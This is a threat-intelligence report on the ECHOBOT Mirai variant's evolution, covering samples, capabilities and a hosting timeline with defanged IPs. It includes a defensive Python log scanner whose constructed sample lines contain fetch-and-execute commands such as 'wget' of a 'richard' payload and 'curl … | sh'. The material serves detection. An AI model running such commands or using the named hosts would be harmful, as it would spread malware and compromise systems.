ECHOBOT’s evolution was the subject of research published in June 2019 by NTT’s Cyber Threat Alliance (CTA) partners at Palo Alto’s Unit 42, who described it as an evolution of Mirai. The new variant added eight new exploits targeting additional Internet of Things (IoT) devices. At the time, the volume of observations from NTT was relatively negligible. However, additional reporting and analysis found added exploitation capabilities as ECHOBOT continued to evolve. Between July and August, NTT observed an increase in traffic related to ECHOBOT. A slight lull from late June through mid-July appears to have been due to the threat actor(s) building more capabilities into the bot, which now boasts over 60 exploits.
Further research suggests ECHOBOT’s updates have been active for longer than originally thought. NTT mapped out the latest version’s evolution and additional insight into its recent surge of activity and exponential increase in exploit capabilities.
To gain a better understanding of ECHOBOT’s innate functionality, researchers analyzed 17 samples. The objective was to identify how and when new features were added or changed as the bot evolved.
Based on identifiable properties, observations, and other particulars of the samples, analysts identified six operational categories.
- Scan – methods for scanning various products and/or services. In this dataset, not including standard ECHOBOT activities, analysts identified 57 scanning methods.
- Attack – methods for attack generation using various TCP/IP protocols. Analysts identified 11 attack methods in the samples.
- Traffic Generation – methods for generating traffic and/or commands. Analysts identified four methods.
- ECHO – methods specifically related to ECHOBOT. This was consistent with all analyzed binaries.
- Uncategorized – analysts found two methods which did not fit the same convention as the others. They specifically targeted two product lines; however, they are implemented differently from the methods that fall into the Scan category.
- Flood – analysts identified three functions providing Denial of Service (DoS) or Distributed Denial of Service (DDoS) attack functionality.
The earliest sample is 5723bff899bfdfe6abe85e95e259ab89, originally submitted to VirusTotal on 20 February 2019. This sample has properties under the following categories:
- Traffic Generation
This is the only binary containing overtly defined traffic generation functionality. It also uses only XMAS scanning for reconnaissance. This activity evolved as the bot matured.
Operational functionality breakdown
All the binaries used the common ECHOBOT-named functions. The variations differed substantially in the number of scan options available, in addition to the inclusion of flood or other attack methods. The 17 binaries broke down as follows (number of samples – categories present):
- 10 – ECHO, Attack, Scan, and Uncategorized
- 4 – ECHO
- 2 – ECHO, Flood
- 1 – Flood, ECHO, Scan, and Traffic Generation
Depending on the age of the sample, between one and more than 40 scanning methods had been added relative to the current binaries. Figure 1 shows the relationships between all binaries and the various function categories.
The earliest sighting we have of ECHOBOT was on 20 February 2019. The URLs in the sample contain the hardcoded string “IP”, which is not a variable and appears to be used as a placeholder. This initial version also includes a reference to downloading a cryptocurrency miner, which deviates from newer samples of ECHOBOT. As we did not find any other references in the code or online, this may have been a test version submitted to VirusTotal during the development period by the actor(s).
The first publicly hosted samples on 147.135.99[.]111 were uploaded between 2 March and 4 March 2019. This coincides with the earliest mentions of ECHOBOT on Twitter on 3 March 2019. This version appears to have removed the mining behavior and is more in line with the current iterations of ECHOBOT. By 23 March 2019, hosting had switched over to 185.244.25[.]213.
Toward the end of April, we found the first mention of a public attack using ‘ECHOBOT scanner’. This came shortly after its infrastructure shifted hosting to 31.13.195[.]251.
As covered in detail by Palo Alto, new iterations began popping up with new capabilities, including adding eight new exploits and targeting additional IoT devices.
June saw ECHOBOT continue to ramp up its arsenal, now targeting over 25 unique exploits in multiple new samples.
In July, NTT observed samples of ECHOBOT, as well as more Satori and Kowai variants of Mirai, which leverage cryptominers, as had been observed with the original ECHOBOT sample. GTIC researchers also identified the location of these malware samples as hosted on open directory servers. Javaop[.]com:4444 was being used as a mining pool for these Mirai variants, but the website’s original use appears to have been mostly idle since 2007.
In August, NTT saw a spike in exploitation attempts dropping the latest downloader titled ‘richard’. The structure was similar to previous ECHOBOT downloaders. This highlighted another infrastructure change as well as a deviation from the previous downloader naming structure.
NTT continues to see attempts to exploit these vulnerabilities and deploy ‘richard’, though the infrastructure is currently offline. We anticipate the ECHOBOT infrastructure will shift again soon to a new IP/ISP as it continues to evolve.
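As an added defensive example (not part of NTT’s report or tooling), the following Python refangs the hosting IPs and mining-pool domain quoted in the timeline above and checks web-server log lines for download URLs that point at those hosts or fetch a payload named ‘richard’. The log format and the request payloads are constructed assumptions, as is the idea that the fetch command appears URL-encoded inside request parameters.

```python
import re
from urllib.parse import unquote

# Indicators quoted in the report, in the defanged form used above.
DEFANGED_HOSTS = ["147.135.99[.]111", "185.244.25[.]213",
                  "31.13.195[.]251", "javaop[.]com"]
DOWNLOADER_NAMES = {"richard"}

def refang(indicator: str) -> str:
    """Turn a defanged indicator ('1.2.3[.]4') back into a matchable host."""
    return indicator.replace("[.]", ".")

KNOWN_HOSTS = {refang(h) for h in DEFANGED_HOSTS}

# Matches http(s) URLs anywhere in a request line, including inside
# URL-decoded exploit parameters; an explicit port is consumed but not kept.
URL_RE = re.compile(r"""https?://([A-Za-z0-9.\-]+)(?::\d+)?(/[^\s'"`;&|<>]*)?""")

def extract_urls(request: str):
    """Return (host, path) pairs for every URL embedded in the line."""
    decoded = unquote(request)
    return [(m.group(1), m.group(2) or "/") for m in URL_RE.finditer(decoded)]

def classify(log_line: str):
    """Return a list of (reason, host, path) hits for one access-log line."""
    hits = []
    for host, path in extract_urls(log_line):
        name = path.rsplit("/", 1)[-1]
        if host in KNOWN_HOSTS:
            hits.append(("known-host", host, path))
        elif name in DOWNLOADER_NAMES:
            hits.append(("downloader-name", host, path))
    return hits

def scan_log(text: str):
    """Map 1-based line numbers to their hits; lines without hits are omitted."""
    results = {}
    for i, line in enumerate(text.splitlines(), 1):
        hits = classify(line)
        if hits:
            results[i] = hits
    return results

# Constructed sample lines (not real captures): two mimic exploit attempts whose
# parameters carry a fetch command, the third is benign browsing.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2019:10:01:02 +0000] "GET /cgi-bin/x?cmd=wget%20http://31.13.195.251/richard HTTP/1.1" 404 0
10.0.0.9 - - [12/Aug/2019:10:05:44 +0000] "POST /api HTTP/1.1" 200 12 "curl http://203.0.113.7:8080/bins/richard | sh"
10.0.0.2 - - [12/Aug/2019:10:06:01 +0000] "GET /index.html HTTP/1.1" 200 512 "http://example.com/"
"""

if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG).items():
        print(lineno, hits)
```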
When waging war, the size of your force matters both from a tactical battle point of view and from a strategic, sustainability angle. While a botnet does not need to be massive in terms of the number of infected hosts at the master’s disposal, the number does need to be significant for any meaningful impact to occur. There have been significant botnet attacks since the turn of the millennium, ranging from Earthlink Spammer in 2000 to Mirai in 2016. As with most brilliant ideas, emulating and modifying an idea is always easier than reinventing the wheel. This appears to also be the case with several Mirai variants, including ECHOBOT.
The actor(s) behind ECHOBOT appear to have given their bot extra propagation ability by indiscriminately exploiting a wide variety of vulnerabilities, new and old, against a wide variety of targets. GTIC continuously monitors ongoing exploitation to track organizational risk, changes in exploitation behavior, or revival of older vulnerabilities and exploits. While we continuously see exploitation attempts of older vulnerabilities, shifts in volume or behavior generally indicate a newer exploitation method, previously unseen binaries in the wild, or a shift in approach which warrants deeper investigation.
The variety of vulnerabilities used suggests attempts to reach as many target systems as possible, with less concern for the actual location of the impacted server. While that may mean that most of these attacks are incidental or opportunistic, it does not make the escalation and evolution in attacks any less impactful. As potential future evolutions of ECHOBOT develop, NTT researchers will continue to monitor developments in the Mirai variant and update detections as appropriate.